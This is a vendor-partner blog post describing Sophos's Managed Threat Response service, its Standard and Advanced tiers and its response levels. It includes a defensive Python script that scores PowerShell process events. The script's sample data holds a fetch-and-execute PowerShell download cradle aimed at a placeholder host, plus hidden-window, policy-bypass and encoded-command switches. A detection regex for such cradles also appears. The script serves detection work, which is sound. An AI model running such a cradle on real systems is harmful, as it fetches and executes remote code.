Sophos MTR - 24/7 Threat Hunting by Experts
On October 1st, Sophos introduced a promising service that I would like to present to you in more detail: MTR, spelled out, Managed Threat Response. The new product grew out of two acquisitions, Rook Security and DarkBytes. Rook Security's people staff the service side of the offering, while DarkBytes contributed the technology side in the form of its Managed Detection and Response (MDR) platform.
What is Sophos Managed Threat Response (MTR)?
Sophos MTR is based on Intercept X Advanced with EDR and addresses the big, fat elephant in the room. 😅 If you have already read my article on Endpoint Detection and Response, you know where the added value of this product lies. But many customers simply don't have the time to hunt for potential threats on their own. On top of that, the job requires highly qualified, specialized staff with the right level of expertise. Such people are not only hard to find, they also command very high salaries. Staffing that role around the clock would swallow a very large part of your IT security budget. As a rule, only very large corporations have the means to create the kind of incentives needed to hire and keep such employees.
This is precisely where Sophos' new MTR service comes in: a 24/7 service in the form of an elite security team that takes care of threat detection in your company and can intervene immediately in critical situations. The new MTR product is therefore not just another menu item in your Central Admin Dashboard, but a targeted response by humans. Sophos particularly emphasizes autonomous intervention. The MTR team will not only inform you of an attack but, if you want it to, will also take the necessary measures on your behalf. In other words, you receive a "fully-managed service".
What variants of the MTR service are available?
We will definitely include the new MTR offering in our product catalog and will soon be able to offer it on our website. Basically, the service is available in the following variants:
- Central Intercept X Advanced with EDR and MTR [Standard / Advanced] - This is the bundle for all customers who have not yet purchased an EDR license. This applies to customers with, for example, “Intercept X Advanced” or just “Endpoint Protection”.
- Central MTR [Standard / Advanced] - This variant is suitable for all customers who already use “Intercept X Advanced with EDR” and want to purchase MTR as an add-on.
Standard or Advanced - What exactly are the differences?
As you can already see from the two variants listed above, Sophos MTR is offered in a Standard and an Advanced variant. Let’s take a look at what services are included in both packages:
Scope of services of the Standard variant
24/7 evidence-based threat hunting
Once you have licensed Sophos MTR and completed the onboarding process (more on this later), your Central account is connected to the MTR team's automated system. Because this system is constantly learning, it can react to known threats automatically. Evidence-based threat hunting (Sophos calls it lead-driven threat hunting) comes into play when something has been detected on your systems that could not be fully resolved automatically and requires human expertise. You can picture this much like the "Threat Analysis Center" in your Central Admin account: there you see, on the one hand, threats that Intercept X Advanced has already stopped automatically and, on the other hand, "suspicious objects" that were detected thanks to AI (artificial intelligence) but could not be resolved. In exactly this situation the MTR team is there for you around the clock. An expert examines the critical alert and, based on their experience, decides how severe this specific detection is and what needs to be done. The findings from the incident are then fed back into the MTR team's automated system, so the next time the same detection occurs, in a different environment, the system can react to it automatically.
Attack detection
In parallel to evidence-based threat hunting, the MTR team pays particular attention to attacks executed through legitimate processes, such as PowerShell. Such attacks are very often successful because the process itself is a trusted, signed Windows binary: a monitoring tool that only looks at the executable sees nothing wrong, and what actually matters is the command line, the parent process and what the script does. The MTR team monitors these processes with analysis methods it developed itself, to ensure they are not being misused for malicious purposes.
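To make concrete what "looking at context instead of the binary" means, here is an added Python example of the kind of triage logic a hunter runs over process-creation telemetry (Windows event 4688 or Sysmon event 1 style data). It is not Sophos's own analysis method, and the sample events, indicator weights, escalation threshold and the domain example.invalid are all constructed for illustration. The script decodes `-EncodedCommand` payloads (Base64 over UTF-16LE, with PowerShell's prefix-abbreviated switches), checks for a hidden window, an execution-policy bypass, a download cradle and an Office parent process, and scores each event so that only the ones that exceed the threshold are handed to a human.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Indicator weights and threshold are assumptions for this example,
# not Sophos's scoring model.
WEIGHTS: Dict[str, int] = {
    "encoded_command": 3,   # -EncodedCommand hides the script from naive keyword matching
    "hidden_window": 2,     # -WindowStyle Hidden: nothing for the user to notice
    "policy_bypass": 1,     # -ExecutionPolicy Bypass: benign admins use it too, so low weight
    "download_cradle": 3,   # fetch-and-execute pattern in the (decoded) command
    "office_parent": 3,     # PowerShell spawned by Word/Excel is the classic macro chain
}
ANALYST_THRESHOLD = 4       # assumed: at or above this score, escalate to a human

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DOWNLOAD_CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-Expression|\biex\b",
    re.IGNORECASE,
)


@dataclass
class Finding:
    pid: int
    hits: List[str] = field(default_factory=list)
    decoded: Optional[str] = None
    score: int = 0


def _switch_matches(name: str, full: str, aliases=()) -> bool:
    """powershell.exe accepts any prefix of a parameter name (-enc, -en, -e ...)
    plus a few fixed aliases such as -ec and -ep; attackers rely on that."""
    return bool(name) and (full.startswith(name) or name in aliases)


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries the script as Base64 over UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> Finding:
    finding = Finding(pid=event["pid"])
    tokens = event["cmdline"].split()
    scan_parts: List[str] = []          # command line with Base64 replaced by its decoded text
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        name = tok[1:].lower() if tok.startswith("-") else ""
        if _switch_matches(name, "encodedcommand", aliases=("ec",)):
            finding.hits.append("encoded_command")
            finding.decoded = decode_encoded_command(nxt) if nxt else None
            scan_parts.append(finding.decoded or "")
            i += 2                      # skip the Base64 blob itself
            continue
        if _switch_matches(name, "windowstyle") and nxt.lower().startswith("h"):
            finding.hits.append("hidden_window")
        if _switch_matches(name, "executionpolicy", aliases=("ep",)) and nxt.lower() in ("bypass", "unrestricted"):
            finding.hits.append("policy_bypass")
        scan_parts.append(tok)
        i += 1
    if DOWNLOAD_CRADLE_RE.search(" ".join(scan_parts)):
        finding.hits.append("download_cradle")
    if event["parent"].lower() in OFFICE_PARENTS:
        finding.hits.append("office_parent")
    finding.score = sum(WEIGHTS[h] for h in finding.hits)
    return finding


def triage(events: List[dict]) -> List[Finding]:
    """Score every powershell.exe process-creation event, highest score first."""
    findings = [analyze_event(e) for e in events if e["image"].lower().endswith("powershell.exe")]
    return sorted(findings, key=lambda f: f.score, reverse=True)


def needs_analyst(finding: Finding) -> bool:
    return finding.score >= ANALYST_THRESHOLD


# Constructed sample events; not real telemetry. example.invalid never resolves.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe", "image": PS_EXE,
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"pid": 5008, "parent": "WINWORD.EXE", "image": PS_EXE,
     "cmdline": f"powershell.exe -w hidden -nop -ep bypass -enc {ENCODED}"},
    {"pid": 5100, "parent": "cmd.exe", "image": PS_EXE,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"pid={f.pid} score={f.score:2d} {'ESCALATE' if needs_analyst(f) else 'ok':8s} hits={f.hits}")
        if f.decoded:
            print("   decoded:", f.decoded)
```

The point of the weights is that no single indicator is damning: an admin's backup script running with `-ExecutionPolicy Bypass` scores 1 and stays in the automated queue, while a hidden, encoded download cradle launched by Word stacks several weak signals into a score that is clearly worth an analyst's time. Real telemetry also brings the script-block log (event 4104), which sees the script after all obfuscation layers have run; this example only works with what the process-creation event offers.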
Activity Reports
Transparency towards you as a customer is very important to the MTR team. You therefore receive activity reports that show everything the team has done on your behalf: the current state of your systems, the insights gathered during the reporting period, and the threats that were averted. Over the time you use the MTR service, a history of these reports builds up. From this data Sophos creates so-called "scorecards" that let you compare yourself with previous periods. This gives you the promised transparency and lets you quickly see whether the MTR service is paying off for you.
Security Health Check
As you can see from the three services above, the MTR Standard service is about detecting threats and preventing attacks. The Security Health Check, in addition, ensures that your Sophos Central products, such as Intercept X Advanced with EDR, are always configured to work as effectively as possible. For this, the MTR team looks at your network requirements and recommends configuration changes. You can therefore be confident that the Central products are properly tailored to your company.
Scope of services of the Advanced variant
Let’s look at what additional services are offered to you in the Advanced variant:
24/7 evidence-less threat hunting
In addition to the evidence-based threat hunting of the Standard package, the Advanced variant also offers evidence-less threat hunting (lead-less threat hunting in Sophos' terminology). Here the work rests entirely on the expertise of the MTR team's analysts, who meticulously examine particularly important devices or user accounts in your company: how they communicate on the network, whether suspicious processes are being executed, and whether any other unusual or atypical behavior can be found. From the collected data they try to anticipate attacker strategies and derive new Indicators of Attack (IoA). If an incident is detected, you are assigned a dedicated response lead who supports you by phone through the complete resolution of the problem!
Optimized telemetry data
The MTR Standard package works with the data provided by Intercept X Advanced with EDR. For richer telemetry, the Advanced variant goes beyond endpoint events and brings data from other Central products into the threat analysis as well.
Direct phone support
Another advantage of the Advanced variant is direct access to the MTR analyst team, which is available to you 24/7. So, if you have a question or, for example, would like to discuss a specific threat case, you can contact the Security Operations Center (SOC) directly by phone.
Proactive improvement of security status
In the Advanced package, the Security Health Check is taken to the next level. While the Standard variant provides general recommendations for the configuration of Central products, the MTR team now also considers the business context behind the configuration settings of, for example, a policy. You receive assistance in remedying configuration and architectural weaknesses that negatively impact your security.
Asset detection
Sophos' specialists not only discuss your critical business processes with you but also build an overview of the applications in use and identify the attack vectors they open up. For this the MTR team maintains a so-called asset inventory, which shows which applications are running on an endpoint and whether they are affected by open vulnerabilities. The result is detailed information specifically tailored to your company.
What levels of support are offered by the Sophos MTR team?
Regardless of whether you choose the Standard or Advanced variant, you retain control over how autonomously the MTR team should operate. This is regulated right at the beginning during the so-called onboarding process. When you purchase the Sophos MTR service, you can choose from three options that determine what response you expect from the MTR team:
- Notification: At this level, if the Sophos MTR team detects a threat incident or an attack, it only informs you and does not act on your behalf. You do, however, receive a detailed report on the cause and the detection, with actionable steps for resolving the threat yourself.
- Collaboration: The Sophos MTR team responds to the threat together with your employees or an external consulting firm.
- Authorization: The MTR team carries out containment and neutralization completely on its own and only informs you afterwards of the measures taken.
What distinguishes Sophos MTR from competitors who also offer a comparable service?
Sophos names two competitors, SentinelOne and CrowdStrike, as its toughest competition, and claims a decisive advantage over both: proactive, autonomous action on the customer's behalf, which according to Sophos did not exist in this form before. With the Authorization response level described above, you no longer have to work through endless lists of alerts and threat notifications yourself; trained Sophos specialists handle all of that for you.
While SentinelOne and CrowdStrike also offer such a service, Sophos points out that it is reserved for their highest service tier, which a small business cannot afford. The highest authorization level of Sophos MTR, on the other hand, is available to every company, regardless of size or booked service level.
Which systems can Sophos currently serve with this service?
The service was only launched on October 1st. For this reason, only Windows endpoints (32- and 64-bit) are currently supported. Support for other systems, such as Windows Server, Linux and macOS, is expected to follow at the end of November 2019, but no precise date has been named yet.
Furthermore, the service is only available in English in the first phase. However, it is planned to include other languages in the repertoire. When this will happen and which languages they will be is not yet fixed.
Conclusion on the Sophos Managed Threat Response Service
What I have read and heard about Sophos' MTR service so far has really impressed me! This service gives small and medium-sized companies the opportunity to afford comprehensive, professional IT security protection. The search for qualified and experienced personnel largely falls away, and you can rely on Sophos' own experts instead.
I also find the three support levels that Sophos offers all customers during onboarding very well done. You decide entirely for yourself how much control you want to hand over. The "Authorization" level, which is also available in the Standard variant, is absolutely unrivaled! So you don't need to buy the more expensive Advanced package if Sophos specialists are to take care of your network security completely on their own.
If you are now interested in Sophos MTR, please do not hesitate to contact us. We will soon publish the different variants of the MTR service on our website, so the price will no longer be a secret. We are also happy to clarify open questions in a personal conversation.
